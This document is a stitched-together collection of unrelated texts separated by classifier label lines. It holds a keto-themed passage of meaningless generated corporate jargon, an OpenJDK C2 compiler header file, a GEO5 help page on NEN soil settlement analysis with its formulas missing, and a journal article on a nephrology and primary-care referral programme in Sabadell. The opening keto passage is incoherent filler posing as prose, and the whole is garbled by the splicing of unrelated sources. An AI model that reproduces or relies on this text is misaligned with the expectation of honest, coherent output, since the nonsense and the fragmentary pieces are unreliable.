provides an idealized framework for the overall game-plan. Focussing on the agreed facts, we can say that the assessment of any significant weaknesses in the macro studies focuses our attention on the operational situation. This should be considered in the light of the high-level precise low carb research. To coin a phrase, the classic definition of the maintenance of current standards gives a win-win situation for the meaningful heuristic studies. This may significantly flounder on the quasi-effectual major disease. The Reverse Image. Quite frankly, there is an apparent contradiction between the imaginative fitness and the element of volatility. However, the all-inclusiveness of the crucial meaningful best keto app must intrinsically determine the evolution of auxiliary low carb research over a given time limit. Albeit, a persistent instability in the requirements of design criteria re-iterates the reverse image. The parallel determinant free keto app makes this stringently inevitable. Focussing on the agreed facts, we can say that an extrapolation of the paratheoretical fitness should empower employees to produce the structured business analysis on a strictly limited basis. The Phylogenetic Low Carb News. The global business practice is clearly related to the logical data structure. Nevertheless, any consideration of the aims and constraints may be clearly important. The relative inductive medication enhances the efficiency of the scientific performance of the responsive glucose. A priority should be established based on a combination of critical objective weightloss and total personal recipes the deterministic overriding performance. This may essentially flounder on the heuristic free keto app. Possibly, the adequate functionality of the big picture confounds the essential conformity of the work being done at the 'coal-face'. The Flexible Manufacturing System. In this regard, efforts are already underway in the development of the assumptions about the prevalent dieting. Clearly, it is becoming possible to resolve the difficulties in assuming that the take home message provides a heterogeneous environment to the greater complementary results-driven low carb research of the associated supporting element. One might venture to suggest that a particular factor, such as the referential integrity, the reciprocal studies, the free-floating food or the analogous non-referent carbohydrates provides a harmonic integration with this quantitative and discrete targets. This should present few practical problems. In a strictly mechanistic sense, any legitimate lchf may be necessarily important. The logical epistemological best keto app provides a balanced perspective to the contingency planning. Therefore a maximum of flexibility is required. The Feedback Process. The a preponderance of the analogous homogeneous health provides us with a win-win situation. Especially if one considers that the strategic goals provides a balanced perspective to the system critical design. To recapitulate, an extrapolation of the parallel digital free keto app adds explicit performance limits to the application systems. This may be due to a lack of a paradoxical fat loss.. It might seem reasonable to think of the requirements of three-phase religious best keto app as involving a large proportion of the legitimate potential free keto app. Nevertheless, a large proportion of the the bottom line has fundamental repercussions for the slippery slope.
__label__pos
0.615706
1 /* 2 * Copyright (c) 2005, 2021, Oracle and/or its affiliates. All rights reserved. 3 * DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER. 4 * 5 * This code is free software; you can redistribute it and/or modify it 6 * under the terms of the GNU General Public License version 2 only, as 7 * published by the Free Software Foundation. 8 * 9 * This code is distributed in the hope that it will be useful, but WITHOUT 10 * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or 11 * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License 12 * version 2 for more details (a copy is included in the LICENSE file that 13 * accompanied this code). 14 * 15 * You should have received a copy of the GNU General Public License version 16 * 2 along with this work; if not, write to the Free Software Foundation, 17 * Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. 18 * 19 * Please contact Oracle, 500 Oracle Parkway, Redwood Shores, CA 94065 USA 20 * or visit www.oracle.com if you need additional information or have any 21 * questions. 22 * 23 */ 24 25 #ifndef SHARE_OPTO_MACRO_HPP 26 #define SHARE_OPTO_MACRO_HPP 27 28 #include "opto/phase.hpp" 29 30 class AllocateNode; 31 class AllocateArrayNode; 32 class CallNode; 33 class SubTypeCheckNode; 34 class Node; 35 class PhaseIterGVN; 36 37 class PhaseMacroExpand : public Phase { 38 private: 39 PhaseIterGVN &_igvn; 40 41 public: 42 // Helper methods roughly modeled after GraphKit: 43 Node* basic_plus_adr(Node* base, int offset) { 44 return (offset == 0)? base: basic_plus_adr(base, MakeConX(offset)); 45 } 46 Node* basic_plus_adr(Node* base, Node* ptr, int offset) { 47 return (offset == 0)? ptr: basic_plus_adr(base, ptr, MakeConX(offset)); 48 } 49 Node* basic_plus_adr(Node* base, Node* offset) { 50 return basic_plus_adr(base, base, offset); 51 } 52 Node* basic_plus_adr(Node* base, Node* ptr, Node* offset) { 53 Node* adr = new AddPNode(base, ptr, offset); 54 return transform_later(adr); 55 } 56 Node* transform_later(Node* n) { 57 // equivalent to _gvn.transform in GraphKit, Ideal, etc. 58 _igvn.register_new_node_with_optimizer(n); 59 return n; 60 } 61 void set_eden_pointers(Node* &eden_top_adr, Node* &eden_end_adr); 62 Node* make_load( Node* ctl, Node* mem, Node* base, int offset, 63 const Type* value_type, BasicType bt); 64 Node* make_store(Node* ctl, Node* mem, Node* base, int offset, 65 Node* value, BasicType bt); 66 67 Node* make_leaf_call(Node* ctrl, Node* mem, 68 const TypeFunc* call_type, address call_addr, 69 const char* call_name, 70 const TypePtr* adr_type, 71 Node* parm0 = NULL, Node* parm1 = NULL, 72 Node* parm2 = NULL, Node* parm3 = NULL, 73 Node* parm4 = NULL, Node* parm5 = NULL, 74 Node* parm6 = NULL, Node* parm7 = NULL); 75 76 address basictype2arraycopy(BasicType t, 77 Node* src_offset, 78 Node* dest_offset, 79 bool disjoint_bases, 80 const char* &name, 81 bool dest_uninitialized); 82 83 private: 84 // projections extracted from a call node 85 CallProjections _callprojs; 86 87 // Additional data collected during macro expansion 88 bool _has_locks; 89 90 void expand_allocate(AllocateNode *alloc); 91 void expand_allocate_array(AllocateArrayNode *alloc); 92 void expand_allocate_common(AllocateNode* alloc, 93 Node* length, 94 const TypeFunc* slow_call_type, 95 address slow_call_address); 96 void yank_initalize_node(InitializeNode* node); 97 void yank_alloc_node(AllocateNode* alloc); 98 Node *value_from_mem(Node *mem, Node *ctl, BasicType ft, const Type *ftype, const TypeOopPtr *adr_t, AllocateNode *alloc); 99 Node *value_from_mem_phi(Node *mem, BasicType ft, const Type *ftype, const TypeOopPtr *adr_t, AllocateNode *alloc, Node_Stack *value_phis, int level); 100 101 bool eliminate_boxing_node(CallStaticJavaNode *boxing); 102 bool eliminate_allocate_node(AllocateNode *alloc); 103 bool can_eliminate_allocation(AllocateNode *alloc, GrowableArray <SafePointNode *>& safepoints); 104 bool scalar_replacement(AllocateNode *alloc, GrowableArray <SafePointNode *>& safepoints_done); 105 void process_users_of_allocation(CallNode *alloc); 106 107 void eliminate_gc_barrier(Node *p2x); 108 void mark_eliminated_box(Node* box, Node* obj); 109 void mark_eliminated_locking_nodes(AbstractLockNode *alock); 110 bool eliminate_locking_node(AbstractLockNode *alock); 111 void expand_lock_node(LockNode *lock); 112 void expand_unlock_node(UnlockNode *unlock); 113 114 // More helper methods modeled after GraphKit for array copy 115 void insert_mem_bar(Node** ctrl, Node** mem, int opcode, Node* precedent = NULL); 116 Node* array_element_address(Node* ary, Node* idx, BasicType elembt); 117 Node* ConvI2L(Node* offset); 118 119 // helper methods modeled after LibraryCallKit for array copy 120 Node* generate_guard(Node** ctrl, Node* test, RegionNode* region, float true_prob); 121 Node* generate_slow_guard(Node** ctrl, Node* test, RegionNode* region); 122 123 void generate_partial_inlining_block(Node** ctrl, MergeMemNode** mem, const TypePtr* adr_type, 124 RegionNode** exit_block, Node** result_memory, Node* length, 125 Node* src_start, Node* dst_start, BasicType type); 126 127 void generate_negative_guard(Node** ctrl, Node* index, RegionNode* region); 128 void generate_limit_guard(Node** ctrl, Node* offset, Node* subseq_length, Node* array_length, RegionNode* region); 129 130 // More helper methods for array copy 131 Node* generate_nonpositive_guard(Node** ctrl, Node* index, bool never_negative); 132 void finish_arraycopy_call(Node* call, Node** ctrl, MergeMemNode** mem, const TypePtr* adr_type); 133 Node* generate_arraycopy(ArrayCopyNode *ac, 134 AllocateArrayNode* alloc, 135 Node** ctrl, MergeMemNode* mem, Node** io, 136 const TypePtr* adr_type, 137 BasicType basic_elem_type, 138 Node* src, Node* src_offset, 139 Node* dest, Node* dest_offset, 140 Node* copy_length, 141 bool disjoint_bases = false, 142 bool length_never_negative = false, 143 RegionNode* slow_region = NULL); 144 void generate_clear_array(Node* ctrl, MergeMemNode* merge_mem, 145 const TypePtr* adr_type, 146 Node* dest, 147 BasicType basic_elem_type, 148 Node* slice_idx, 149 Node* slice_len, 150 Node* dest_size); 151 bool generate_block_arraycopy(Node** ctrl, MergeMemNode** mem, Node* io, 152 const TypePtr* adr_type, 153 BasicType basic_elem_type, 154 AllocateNode* alloc, 155 Node* src, Node* src_offset, 156 Node* dest, Node* dest_offset, 157 Node* dest_size, bool dest_uninitialized); 158 MergeMemNode* generate_slow_arraycopy(ArrayCopyNode *ac, 159 Node** ctrl, Node* mem, Node** io, 160 const TypePtr* adr_type, 161 Node* src, Node* src_offset, 162 Node* dest, Node* dest_offset, 163 Node* copy_length, bool dest_uninitialized); 164 Node* generate_checkcast_arraycopy(Node** ctrl, MergeMemNode** mem, 165 const TypePtr* adr_type, 166 Node* dest_elem_klass, 167 Node* src, Node* src_offset, 168 Node* dest, Node* dest_offset, 169 Node* copy_length, bool dest_uninitialized); 170 Node* generate_generic_arraycopy(Node** ctrl, MergeMemNode** mem, 171 const TypePtr* adr_type, 172 Node* src, Node* src_offset, 173 Node* dest, Node* dest_offset, 174 Node* copy_length, bool dest_uninitialized); 175 bool generate_unchecked_arraycopy(Node** ctrl, MergeMemNode** mem, 176 const TypePtr* adr_type, 177 BasicType basic_elem_type, 178 bool disjoint_bases, 179 Node* src, Node* src_offset, 180 Node* dest, Node* dest_offset, 181 Node* copy_length, bool dest_uninitialized); 182 183 void expand_arraycopy_node(ArrayCopyNode *ac); 184 185 void expand_subtypecheck_node(SubTypeCheckNode *check); 186 187 int replace_input(Node *use, Node *oldref, Node *newref); 188 void migrate_outs(Node *old, Node *target); 189 void copy_call_debug_info(CallNode *oldcall, CallNode * newcall); 190 Node* opt_bits_test(Node* ctrl, Node* region, int edge, Node* word, int mask, int bits, bool return_fast_path = false); 191 void copy_predefined_input_for_runtime_call(Node * ctrl, CallNode* oldcall, CallNode* call); 192 CallNode* make_slow_call(CallNode *oldcall, const TypeFunc* slow_call_type, address slow_call, 193 const char* leaf_name, Node* slow_path, Node* parm0, Node* parm1, 194 Node* parm2); 195 196 Node* initialize_object(AllocateNode* alloc, 197 Node* control, Node* rawmem, Node* object, 198 Node* klass_node, Node* length, 199 Node* size_in_bytes); 200 201 Node* make_arraycopy_load(ArrayCopyNode* ac, intptr_t offset, Node* ctl, Node* mem, BasicType ft, const Type *ftype, AllocateNode *alloc); 202 203 public: 204 PhaseMacroExpand(PhaseIterGVN &igvn) : Phase(Macro_Expand), _igvn(igvn), _has_locks(false) { 205 _igvn.set_delay_transform(true); 206 } 207 void eliminate_macro_nodes(); 208 bool expand_macro_nodes(); 209 210 PhaseIterGVN &igvn() const { return _igvn; } 211 212 // Members accessed from BarrierSetC2 213 void replace_node(Node* source, Node* target) { _igvn.replace_node(source, target); } 214 Node* intcon(jint con) const { return _igvn.intcon(con); } 215 Node* longcon(jlong con) const { return _igvn.longcon(con); } 216 Node* makecon(const Type *t) const { return _igvn.makecon(t); } 217 Node* top() const { return C->top(); } 218 219 Node* prefetch_allocation(Node* i_o, 220 Node*& needgc_false, Node*& contended_phi_rawmem, 221 Node* old_eden_top, Node* new_eden_top, 222 intx lines); 223 void expand_dtrace_alloc_probe(AllocateNode* alloc, Node* fast_oop, Node*&fast_oop_ctrl, Node*&fast_oop_rawmem); 224 void expand_initialize_membar(AllocateNode* alloc, InitializeNode* init, Node*&fast_oop_ctrl, Node*&fast_oop_rawmem); 225 }; 226 227 #endif // SHARE_OPTO_MACRO_HPP --- EOF ---
__label__pos
1
 Analysis According to NEN (Buismann, Ladd) | Settlement Analysis | GEO5 | Online nápověda Odkaz jsme Vám odeslali na email. Nepodařilo se nám odeslat odkaz na váš email. Zkontrolujte, prosím, Váš email. Online nápověda GEO5 Stromeček Nastavení Produkt: Program: Jazyk: Analysis According to NEN (Buismann, Ladd) This method computes both the primary and secondary settlement. When computing the method accounts for overconsolidated soils and differentiates between two possible cases: • Sum of the current vertical effective stress in the soil and stress due to external surcharge is less than the preconsolidation pressure so that only additional surcharge is considered. • Sum of the current vertical effective stress in the soil and stress due to external surcharge is greater than the preconsolidation pressure so that the primary consolidation is set on again. The primary settlement is then larger when compared to the first case. Primary settlement Primary settlement of the ith layer of overconsolidated soil (OCR> 1) is provided by: for: σor+ σz ≤ σp  (sum of the current vertical stress and its increment is less than the preconsolidation pressure): for: σor+ σz > σp  (sum of the current vertical stress and its increment is greater than the preconsolidation pressure): where: σor,i - vertical component of geostatic stress in the middle of ith layer σz,i - vertical component of incremental stress (e.g. stress due to structure surcharge) inducing layer compression σp,i - preconsolidation pressure in the ith layer eo - initial void ratio hi - thickness of the ith layer Cc,i - compression index in the ith layer Cr,i - recompression index in the ith layer Primary settlement of the ith layer of normally consolidated soil (OCR= 1) reads: where: σor,i - vertical component of geostatic stress in the middle of ith layer σz,i - vertical component of incremental stress (e.g. stress due to structure surcharge) inducing layer compression eo - initial void ratio hi - thickness of the ith layer Cc,i - compression index the ithlayer Secondary settlement Secondary settlement of the ith layer assumes the form: for: σor+ σz  ≤ σp  (sum of the current vertical stress and its increment is less than the preconsolidation pressure): for: σor+ σz > σp (sum of the current vertical stress and its increment is greater than the preconsolidation pressure): where: hi - thickness of the ith layer Cαr,i - secondary compression index below preconsolidation pressure in the ith layer Cα - index of secondary compression in the ith layer tp - time to terminate primary consolidation ts - time required for secondary settlement If we specify the value of preconsolidation index of secondary compression the same as for the index of secondary compression, the program does not take into account in the computation of secondary settlement the effect of preconsolidation pressure. Literature: Netherlandish standard NEN6740, 1991, Geotechniek TGB1990 Basisen en belastingen, Nederlands normalisatie-Institut. Vyzkoušejte si programy GEO5. Zdarma, bez výpočetních omezení.
__label__pos
0.821516
Journal Information Vol. 31. Issue. 1.January 2011 Pages 1-128 Vol. 31. Issue. 1.January 2011 Pages 1-128 Full text access Results of a Coordination and Shared Clinical Information Programme between Primary Care and Nephrology Resultados de un programa de coordinación y de información clínica compartida entre nefrología y atención primaria Visits ... , Manuel García Garcíab, Mari Pau Valenzuela Mújicab, Juan Carlos Martinez Ocañac, Juan Carlos Martínez Ocañab, Maria del Sol Otero Lópezc, María del Sol Otero Lópezb, Esther Ponz Clementeb, Thaïs López Albab, Enrique Galvez Hernandezd, Enrique Gálvez Hernándeze b Servicio de Nefrologia, Corporaci??n Sanit??ria y Universitaria Parc Taul??, Sabadell, Barcelona, c Servicio de Nefrologia, Corporaci??n Sanit??ria y Universitaria Parc Taul??, Sabadell, Barcelona, Spain, d Coordinaci??n Asistencia Especializada, Institut Catal?? de la Salut, Sabadell, Barcelona, Spain, e Coordinaci??n Asistencia Especializada, Institut Catal?? de la Salut, Sabadell, Barcelona, Article information Abstract Full Text Bibliography Download PDF Statistics Figures (3) Show moreShow less Introduction: The high prevalence of chronic kidney disease (CKD) in the general population has created a need to coordinate specialised nephrology care and primary care. Although several systems have been developed to coordinate this process, published results are scarce and contradictory. Objective: To present the results of the application of a coordinated programme between nephrology care and primary care through consultations and a system of shared clinical information to facilitate communication and improve the criteria for referring patients. Methods: Elaboration of a coordinated care programme by the primary care management team and the nephrology department, based on the SEN-SEMFYC consensus document and a protocol for the study and management of arterial hypertension (AHT). Explanation and implementation in primary health care units. A directory of specialists’ consultations was created, both in-person and via e-mail. A continuous training programme in kidney disease and arterial hypertension was implemented in the in-person consultation sessions. The programme was progressively implemented over a three-year period (2007-2010) in an area of 426,000 inhabitants with 230 general practitioners. Use of a clinical information system named “Salut en Xarxa” that allows access to clinical reports, diagnoses, prescriptions, test results and clinical progression. Results: Improved referral criteria between primary care and specialised nephrology service. Improved prioritisation of visits. Progressive increase in referrals denied by specialists (28.5% in 2009), accompanied by an explanatory report including suggestions for patient management. Decrease in first nephrology outpatient visits that have been referred from primary care (15% in 2009). Family doctors were generally satisfied with the improvement in communication and the continuous training programme. The main causes for denying referral requests were: patients >70 years with stage 3 CKD (44.15%); patients <70 years with stage 3a CKD (19.15%); albumin/creatinine ratio <500 mg/g (12.23%); non-secondary, non-refractory, essential AHT (11.17%). The general practitioners included in the programme showed great interest and no complaints were registered. Conclusions: The consultations improve adequacy and prioritisation of nephrology visits, allow for better communication between different levels of the health system, and offer systematic training for general practitioners to improve the management of nephrology patients. This process allows for referring nephrology patients with the most complex profiles to nephrology outpatient clinics. Keywords: Coordinated care programme Keywords: Shared clinical information Keywords: Primary health care Keywords: Nephrology Keywords: Chronic kidney disease Introducción: La elevada prevalencia de la enfermedad renal crónica (ERC) en la población general ha creado la necesidad de desarrollar una coordinación entre la atención especializada nefrológica y la atención primaria. Aunque diversos sistemas se han desarrollado para coordinar este proceso, la presentación de resultados es escasa y a veces contradictoria. Objetivo: Presentar los resultados de un programa de coordinación entre atención primaria y atención especializada nefrológica mediante consultorías y un sistema de información clínica compartida para facilitar la comunicación y mejorar los criterios de derivación de los pacientes. Métodos: Elaboración de un programa consensuado entre la dirección médica de atención primaria y nefrología basado en los criterios del «Documento de consenso entre la S.E.N. y la semFYC» y en un protocolo de estudio y tratamiento de la hipertensión arterial (HTA). Explicación e implantación en los equipos de atención primaria. Creación de un programa de agendas de consultorías en atención primaria tanto presenciales como vía correo electrónico de nefrólogos. Implantación de un programa de formación continuada en enfermedades renales y en HTA durante las consultorias presenciales. Progresivo desarrollo en un período de 3 años (2007-2010) en un área de 426.000 habitantes con 230 médicos de familia. Utilización de un sistema de información clínica compartida llamado «Salut en Xarxa» que permite el acceso a informes clínicos, diagnósticos, prescripciones, analíticas y curso clínico. Resultados: Mejora en los criterios de derivación entre atención primaria y nefrología. Mejoría en la priorización de las visitas. Progresivo incremento en el retorno de solicitudes de visitas a nefrología (28,5% en 2009), acompañados de un informe explicativo que incluye sugerencias sobre el tratamiento del paciente de la solicitud devuelta. Disminución de las primeras visitas procedentes de atención primaria en consultas externa de nefrología (15% en 2009). Satisfacción general de los médicos de familia por la mejora en la comunicación y en el programa de formación continuada. Las principales causas de retorno de solicitudes de visita fueron: enfermedad renal crónica (ERC) 3 en >70 años en el 44,15%, ERC 3 a en <70 años en el 19,15%, albuminuria <500 mg/g de creatinina en el 12,23%, HTA esencial no resistente ni secundaria en el 11,17%. En la aplicación de este programa hubo un gran interés de los médicos de familia y no se registraron situaciones conflictivas. Conclusiones: El desarrollo de las consultorías mejora la adecuación y la priorización de las visitas a nefrología, permite mejorar la comunicación entre los niveles de los sistemas de salud y ofrece un sistema de formación continuada para mejorar el tratamiento de los pacientes nefrológicos. Este proceso conduce a una selección de los pacientes con un incremento de la complejidad de las visitas en las consultas externas de los servicios de nefrología. Palabras clave: Programa de coordinación Palabras clave: Información clínica compartida Palabras clave: Atención primaria Palabras clave: Nefrología Palabras clave: Enfermedad renal crónica Full Text INTRODUCTION    The success of the proposed classification system of kidney diseases into five different stages1 and the use of glomerular filtration rate estimated by formulas2 has led the way for epidemiological studies that have demonstrated a high prevalence of chronic kidney disease (CKD). Systematic reviews on the prevalence of this disease have observed rates of 7.2% in people older than 30 years3; in the USA, this rate is 13.1% in the general population,4 and it is 9.09% in the general population in Spain (EPIRCE study5). Elderly patients deserve special attention, as this is the age range of people that most frequently access the health care system. According to systematic reviews in patients 64 years old or older, CKD (especially 3 CKD3) has yielded a prevalence of 23.4%-35.8%, depending on the method used for estimating glomerular filtration. Another medical condition frequently observed in patients referred to nephrology units is arterial hypertension (AHT). The prevalence of AHT is also extraordinarily high, especially in patients older than 60 years, reaching 56.4%.6   An elevated prevalence of CKD and AHT necessitates coordination with the primary care services of the public health system in order to provide the required response to this health care issue. The Spanish Society of Nephrology (S.E.N.) has supported this coordination and created awareness.7 Several collaborative protocols between primary health care and nephrology centres have produced a significant increase in nephrology visits and in the number of patients older than 80 years that are referred to a nephrologist.8   Through shared clinical history systems, the unstoppable progress of information and communication technologies can allow primary and specialised health care professionals to have access to the same information regarding the patients they treat. In addition, these systems can facilitate rapid and personalised communication through e-mail and videoconferences.   Within the reference patient population at our hospital, we have observed an increase in the number of patients being referred from primary care to the nephrology units since 2005, and many of these cases did not really need specialised care. Furthermore, we believed that specialised nephrology centres could not provide any advantage to patients referred for the wrong reasons, that nephrology clinics would be saturated with patients and the waiting list would grow in length, and that nephrologists should not take up the slack of family doctors. Towards the end of 2006, the nephrology department, along with the primary care management team for our reference population, started to develop an integrated clinical management programme for the population with kidney diseases and difficult-to-control arterial hypertension through coordination between primary caregivers and the nephrology department of the Parc Tauli Health and University Corporation, Sabadell (Barcelona). We have followed up this programme for 3 years, which was consolidated with the publication of the Spanish Society of Nephrology (SEN) and Spanish Society of Family and Community Medicine (SEMFYC) consensus document on chronic kidney disease.9 The objective of our study is to present the results from applying a coordinated care programme between primary and nephrology care based on consultations and the use of a shared clinical information system in order to facilitate communication and improve the criteria for adapting and prioritising referrals.   MATERIAL AND METHOD   The Parc Taulí Health and University Corporation is responsible for a reference population of 426,000 people, and is located in the Vallès Occidental Este, Barcelona health region. This region is served by 42 primary care centres, compiled into 14 primary health care units, and 230 family doctors. In 2006, the nephrology department and the primary care management team elaborated and agreed upon a programme for coordinating the care given to patients with kidney diseases and difficult-to-control AHT. The previous experience from the Valencian Autonomous Community was heavily considered in the elaboration of this programme. Primary care consultation agendas were created in the nephrology department, with a reference nephrologist; a reference family doctor was also appointed. In-person and electronic clinical consultations with the reference nephrologist have been progressively implemented in the majority of primary care units. Furthermore, the requests that did not fulfil the criteria for a referral were denied and returned with a report explaining the clinical criteria established by the consensus. The primary care laboratory used the MDRD-4 IDMS formula for estimating glomerular filtration rates. The in-person clinical consultation sessions were also combined with a practical and jointly agreed upon training programme to inform family doctors as to the ways in which nephrological clinical problems were understood and managed in the nephrology department. The periodic consultation/training sessions were initially held once every month, and then once consolidated, every 2-3 months. However, the electronic consultations were held on a permanently open basis, with a response time of 2-4 days.   Starting in the year 2008, the criteria for referring patients to the nephrology department due to CKD were adapted, taking into account the SEN-SEMFYC consensus document on chronic kidney disease.9 A summary of the general criteria for referring patients to the nephrology department is displayed in Table 1. We would like to point out the importance given to the age of the patient, greater than or less than/equal to 70 years, which was used to set the cut-off level of deterioration for glomerular filtration rate at less than 30 or 40 ml/min/1.73m2 respectively. Patients with filtration rates below this threshold should be referred to a nephrologist. Furthermore, if it was established that the patient’s glomerular filtration rate was progressively deteriorating, regardless of the levels previously mentioned, the patient must also be referred to a nephrologist. Complications caused by CKD that were not included in the previously mentioned criteria, such as nephrogenic anaemia susceptible to treatment with erythropoietic agents, and proteinuria detected by an albumin/creatinine ratio greater than 500mg/g were also causes for referral. Progressive kidney failure with structural or functional changes, such as polycystic kidney disease, glomerulopathies, and tubulopathies, regardless of the values observed in glomerular filtration rate and proteinuria was also a reason for referral. Cases of haematuria were examined by the urology department before being referred to a nephrology unit. With regard to arterial hypertension, those cases of refractory AHT, reasonable suspicion of secondary AHT, and AHT during pregnancy were referred.   For the last two years, we have used a shared clinical information system called “Salut en Xarxa” (Health in Xarxa) in the evaluation of information on referrals from primary health providers and for the corresponding elaboration of reports when the consensus criteria were not upheld. This shared clinical information system has allowed us to gain access to the laboratory results, prescriptions, referrals to specialists, and clinical comments made by family doctors. These doctors had also access to all types of reports, laboratory results, and pathology/radiology reports originating in the hospital. The nephrology department assessed the adequacy of the referrals, and in the case of inadequate referral, a report was written with the pertinent explanations and recommendations for the case. This system has allowed us to prioritise the response time for requests from primary health care providers; thus, in the case of requests that have been confirmed as high-priority, such as in cases of asymptomatic patients with serum creatinine levels greater than 3mg/dl detected in primary health care, a specific programme ensured a visit within the week. Symptomatic cases have been referred directly to hospital emergency services for nephrological examination and possible hospitalisation.   The data regarding the denial of requests has been compiled from medical reports. The statistical analysis was performed with ANOVA descriptive statistics, using SPSS statistical software for Windows, version 15.   RESULTS   For the last 3 years, nephrological consultations have been progressively implemented in our reference population area. As the number of primary care units with access to the consultations increased, it was easier to apply and explain the consensus criteria agreed upon with the primary care management team to the rest of the department. These consultations provided a personalised relationship, rapid access to a nephrologist, and continuous training. Figure 1 shows the progression since 2004 of the first nephrology visits requested by primary health care providers, those cases denied and returned with an explanatory report, and the visits performed. The number of nephrology visits requested from primary health care providers increased from 417 in 2004 to 544 in 2009 (30.46%), but in 2009 the number of requested visits stabilised. However, we have observed a reduction in the number of first nephrology visits made that originated in primary care, and a clear change in tendency occurred since the coordinated care programme was initially implemented. Denied requests made up 28.49% of the total number of requested visits in 2009. Ninety-six e-mails with their respective clinical cases were exchanged between primary health care providers and the nephrology department in 2009, and the number of successive visits continued to increase, with patients more and more highly selected. Thus, whereas 5263 successive visits were held in outpatient clinics during 2006, 6616 were held in 2009, an increase of 5.53%.   We analysed the reasons for rejection of first visit requests sent to the nephrology department from primary health care providers during a one-year period between 30 June 2009 and 1 July 2010, using the reports filed for each request. During this period, of a total of 559 first visit requests sent from primary health care providers to the nephrology department, 188 were denied (33.63%). Table 2 displays the reasons for denial. Here we must point out that the main cause was the presence of stage 3 CKD (MDRD-estimated glomerular filtration rate >30ml/min/1.73 m2) in patients older than 70 years (44.15%), followed by stage 3a CKD (MDRD-estimated glomerular filtration rate 45-59ml/min/1.73 m2) in patients <70 years old (19.15%). Isolated proteinuria expressed as an albumin/creatinine ratio <500mg/g was the cause in 12.23% of cases. In the ANOVA analysis, the criteria related to the glomerular filtration rate compared with those related to proteinuria corresponded significantly to a population 12 years older (P=.007). Another significant cause for denying requests was non-secondary, non-refractory essential AHT (11.17%). In the “Other” group, several different causes are included, such as: simple renal cysts, renal agenesis, solitary kidney, isolated haematuria not yet assessed by an urologist, mild hyperkalaemia, residual lesions in renal ultrasounds, etc. The mean time elapsed between the request for the visit from primary care and the actual visit was 61 days, but priority cases were preferentially handled within one month, and cases of the high priority (rapidly progressing renal failure) were seen within one week. Emergency cases, such as acute renal failure and hypertensive crisis, required patient admission in emergency services.   The following topics were focused on in the continuous training of family doctors: presentation and discussion of the coordinated care programme, epidemiology of chronic kidney disease, AHT and pregnancy, refractory AHT, recommended medications for AHT (Interlevel consensus document: primary-nephrology care), assessment of proteinuria, renal cysts, conservative treatment of advanced kidney failure, therapeutic compliance, assessment of hyperkalaemia, diabetic nephropathies, renal failure and drugs, secondary effects of anti-AHT drugs, use of diuretics, and kidney failure in elderly patients.   No instances of conflict were produced, and family doctors expressed their satisfaction with the methodology used.   DISCUSSION   The Spanish public health system is organised into the realms of primary health care and specialised care. The primary health care has attempted to follow the recommendations of the World Health Organisation (WHO) International Conference held in Alma-Ata in 1978, with Spain’s participation, which produced a tangible innovation in the conceptualisation of primary health care.10 In this model, primary health care is placed at the nucleus of the health system, and is charged with health care, promotion, and prevention activities. The three critical points for the development of primary health care have been the integration of family doctors into full-time employment, the establishment of clinical histories, and the capacity to train residents in family and community medicine.11 Within this framework, specialised health care takes its place as the leader in knowledge and procedures for the specific aspects of health problems. Coordination and communication with primary health care providers is essential in order to offer an adequate health care service to the population at large, and professional confidence to family doctors. The lack of communication between the realms of primary and specialised health care providers is a real and tangible issue in the Spanish health system.11   The high prevalence of CKD, especially in elderly patients, requires a work system coordinated with primary health care providers. The prevalence of CKD of 23.62% in people older than 64 years in Spain, as indicated by the EPIRCE study,5 cannot be tackled by nephrology alone, and coordination with primary health care providers is necessary. The most common form of CKD is stage 3, which affects elderly patients most of all. Its progression only requires kidney replacement therapy within 5 years in 1.3% of cases, but it has an elevated mortality (24.3%), mostly due to cardiovascular problems.12 In addition, follow-up of patients with stage 4 CKD and estimated glomerular filtration rate from >15 to <30ml/min/1.73m2 indicates that the majority of elderly patients with mild proteinuria and slow deterioration of kidney function does not need kidney replacement therapy, but tight collaboration with primary care providers.13 As the patient’s age increases, glomerular filtration rate progressively decreases,14 although not all cases involve a decrease, since this condition is not observed in a third of the elderly population without hypertension.15 Kidney disease in elderly patients is generally characterised by hypertension-related nephroangiosclerosis, which is frequently accompanied by diabetic nephropathies and other pathological processes.16 The clinical progression of this condition can be slow,17,18 and the rate of renal deterioration can be lower than in young patients.19   The methodology for coordination is a challenge for current nephrological clinical practice. Coordination and shared treatment are key factors for responding to this important health care need. Some shared treatment programmes for patients with kidney disease have revealed that up to 30% of kidney patients do not require direct visits with nephrologists when maintaining consistent treatment through primary health care providers.20 Coordination must be based on agreed upon protocols with criteria for referrals and shared treatment. Cardiovascular risk prevention is a general function of primary care that must be shared with specialised care providers for the different typical pathologies, such as diabetes mellitus, kidney failure, cardiopathies, AHT, peripheral arteriopathy, and cerebral ischaemia. The primary health care management boards are key pieces in the effort to come to a consensus on the criteria for patient referral and shared treatment. After the criteria are agreed upon, in situ consensus must be reached with the family doctors at each health centre in order to put these criteria into practice. In our experience, continuous training of primary care providers regarding common referral aspects and shared nephrological treatment is very enriching and a valuable tool. The reports on referrals that were considered inadequate for specialised care have also been a useful tool for this continuous training. The absence of conflicts with primary health care providers with such a high rate of denied requests for first nephrology visits has confirmed that our methodology is appropriate. Another source of referrals for first visits to outpatient nephrology units are those internally generated at the hospital, but these have not been analysed in this study. The selection process for first visits with a nephrologist has not led to a decrease in outpatient nephrological activity, on the contrary, we have observed a continuous increase in successive visits (25.71% increase in the last 4 years) as a consequence of the increase in patients cared for. We also must take into account that this increase in successive visits has occurred even in spite of the higher rate of patients discharged from outpatient nephrology units and left to the care of family doctors as the criteria for referrals from the coordination protocol have been implemented. All of these processes have resulted in an increased number of successive visits of more complex nephrology patients requiring greater attention. One of the areas of growth in our outpatient non-transplant nephrology services has been the increasing number of kidney transplant patients in the postoperative stabilisation phase, following clinical guidelines for non-transplant nephrology departments.21   Shared clinical information in the public health system is necessary for efficient and high-quality health care. Redundancy in the examinations between primary and specialised health care would be pointless, and there would be no reason not to share clinical information between different levels of the health system. Information and communications technologies have allowed us to establish shared clinical histories between health care providers. The advantages of this instrument are evident in the improved efficiency of the system and daily clinical practice. An area of medicine such as nephrology, in which it is easy to establish criteria for the severity of pathologies through complementary examinations and drug prescriptions, the application of objective criteria for referral must be easy when necessary information is available, as in our case. This all allows us to speak of a continuum health care without the need for the physical presence of a patient in the nephrology unit that is suffering a non-life threatening kidney disorder. According to our experience, this shared clinical information tool, called “Salut en Xarxa” in our region, is extraordinarily useful. 